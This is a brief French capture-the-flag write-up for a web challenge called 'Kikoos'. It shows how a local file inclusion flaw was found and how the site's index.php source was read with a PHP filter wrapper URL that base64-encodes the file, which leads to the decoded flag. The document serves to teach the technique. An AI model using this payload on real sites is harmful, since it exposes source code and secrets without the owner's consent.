Ceci est une ancienne révision du document !
WEB 100 - Kikoos
Le challenge est un site web , qui nous montre des photos de voitures qui se déplace sur la page web.
Après inspection des sources (html) du site web on remarque :
<title>LFI</title>
On tente de modifier l'url :
http://kikoos.ctf.insecurity-insa.fr/?page=../
La page réagit en nous renvoyant une indication explicant que le paramètre contient des caractères interdit.
La faille est donc une LFI (Local File Inclusion).
Après plusieurs tentative de guessing d'une page administrateur on tente de récupérer le code source de la page index.php avec un wrapper PHP.
http://kikoos.ctf.insecurity-insa.fr/?page=php://filter/read=convert.base64-encode/resource=index.php
La page nous renvoie le code en base 64 :
PD9waHANCi8vIEZMQUd7TGVha19vZl9GbGFnX2lzX0ltcG9zc2libGU9TEZJfQ0KPz4NCg== ...
On décode le base64 :
FLAG : FLAG{Leak_of_Flag_is_Impossible=LFI}